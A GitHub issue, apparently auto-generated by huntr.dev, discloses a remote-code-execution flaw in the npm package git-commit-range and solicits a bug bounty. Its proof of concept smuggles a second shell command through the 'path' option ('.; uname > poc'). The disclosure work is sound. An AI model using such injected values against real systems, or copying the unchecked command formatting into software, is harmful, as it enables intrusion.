Security Notice & Bug Bounty - Remote Code Execution - huntr.dev

This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)

## Vulnerability Description
The issue occurs because a `user input` is formatted inside a `command` that will be executed without any check. The issue arises here: https://github.com/aichbauer/node-git-commit-range/blob/master/index.js#L32

## POC

```js
// poc.js
const gitCommitRange = require('git-commit-range');

gitCommitRange(); 

gitCommitRange({
  path: '.; uname > poc',
  from: '15be93c31ad87c9ced03ba0b60fc2fb55c977c5c',
  to: '32b940b014322834966d79b109d2d7adec8e3ea3',
  include: false,
});
```

## Impact
`RCE` on `git-commit-range` via `insecure command formatting`


# Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚

_Automatically generated by @huntr-helper..._

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Security Notice & Bug Bounty - Remote Code Execution - huntr.dev #9

Vulnerability Description

POC

Impact

Bug Bounty

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Security Notice & Bug Bounty - Remote Code Execution - huntr.dev #9

Description

Vulnerability Description

POC

Impact

Bug Bounty

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions